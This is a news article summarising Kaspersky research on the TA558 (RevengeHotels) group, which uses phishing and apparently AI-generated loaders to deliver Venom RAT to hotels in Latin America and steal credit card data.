A cybercriminal group known as TA558 is deploying sophisticated malware attacks against hotels in Brazil and other Spanish-speaking regions. According to a new report from cybersecurity firm Kaspersky, the group is now using artificial intelligence to generate malicious code, marking a significant evolution in its tactics.
The attacks, observed during the summer of 2025, aim to install a remote access trojan called Venom RAT. The primary goal is to steal sensitive credit card information from hotel reservation systems and data feeds from online travel agencies.
Key Takeaways
- The cybercriminal group TA558, also called RevengeHotels, is targeting the hospitality industry in Latin America.
- Attackers are using phishing emails in Portuguese and Spanish with hotel reservation themes to deliver malware.
- Kaspersky researchers found evidence that Large Language Models (LLMs) were used to generate parts of the malicious code.
- The main payload is Venom RAT, a tool designed to steal data, evade security software, and maintain persistence on infected systems.
- The ultimate objective is to capture credit card data from hotel guests and online travel agencies like Booking.com.
New Attack Method Involves AI-Generated Code
The latest campaign from TA558 begins with phishing emails tailored to hotel staff. These messages, written in Portuguese and Spanish, use lures such as fake hotel reservations or job applications to convince employees to click on malicious links.
Once a link is clicked, a JavaScript payload is downloaded. Researchers at Kaspersky noted that this script was unusual. Its structure and heavy commenting strongly suggest it was generated by an AI model.
What are Large Language Models (LLMs)?
Large Language Models are advanced artificial intelligence systems trained on vast amounts of text and code. They can generate human-like text, translate languages, and write software code. While they have many positive uses, cybercriminals are beginning to adopt them to automate and improve their malicious scripts.
This initial script acts as a loader, triggering a series of steps to infect the system. It executes a PowerShell script that connects to an external server to download another component, a downloader file named "cargajecerrr.txt". This downloader then retrieves the final payloads: a loader and the Venom RAT malware.
A History of Targeting the Hospitality Sector
TA558, which Kaspersky tracks as RevengeHotels, is not a new threat. The group has been active since at least 2015, consistently focusing its efforts on the hospitality and travel industries across Latin America.
In its earlier campaigns, the group used emails with malicious Microsoft Office documents. Some of these attachments exploited a known vulnerability (CVE-2017-0199) to install a variety of remote access trojans, including:
- Revenge RAT
- NjRAT
- NanoCoreRAT
- 888 RAT
Over the years, research from firms like Proofpoint and Positive Technologies has shown the group's continuous adaptation. They have expanded their toolkit to include other well-known malware such as Agent Tesla, AsyncRAT, FormBook, and LokiBot, demonstrating a persistent effort to refine their attack methods.
Primary Target: Financial Data
The central motivation for these attacks is financial gain. TA558 specifically targets systems that store or process guest credit card details. This includes information entered directly into a hotel's system and payment data transmitted from major online travel agencies (OTAs) like Booking.com.
The Capabilities of Venom RAT
The malware at the center of this new campaign, Venom RAT, is a powerful commercial tool based on the open-source Quasar RAT. It is sold on cybercrime forums with different pricing tiers. A lifetime license costs approximately $650, while a one-month subscription can be purchased for $350.
Venom RAT provides attackers with extensive control over an infected computer. Its core functions include data exfiltration, acting as a reverse proxy for network traffic, and implementing robust anti-kill protection to ensure it continues running.
Advanced Evasion and Persistence Techniques
The malware employs several sophisticated methods to avoid detection and removal. First, it modifies the security permissions of its own process to prevent users or security software from terminating it. It also runs a continuous check every 50 milliseconds for any running processes associated with security analysis or system monitoring tools. If any are detected, it terminates them immediately.
To ensure it remains on the system after a reboot, Venom RAT creates entries in the Windows Registry. If the malware is executed with administrative rights, it elevates its own status to that of a critical system process, making it extremely difficult to stop. It also prevents the computer from entering sleep mode to maintain a constant connection.
"RevengeHotels has significantly enhanced its capabilities, developing new tactics to target the hospitality and tourism sectors," Kaspersky stated in its report. "With the assistance of LLM agents, the group has been able to generate and modify their phishing lures, expanding their attacks to new regions."
Furthermore, Venom RAT has features designed to disable Microsoft Defender Antivirus by terminating its process and altering the task scheduler. It can also spread to other devices through removable USB drives, increasing its potential to move across a network.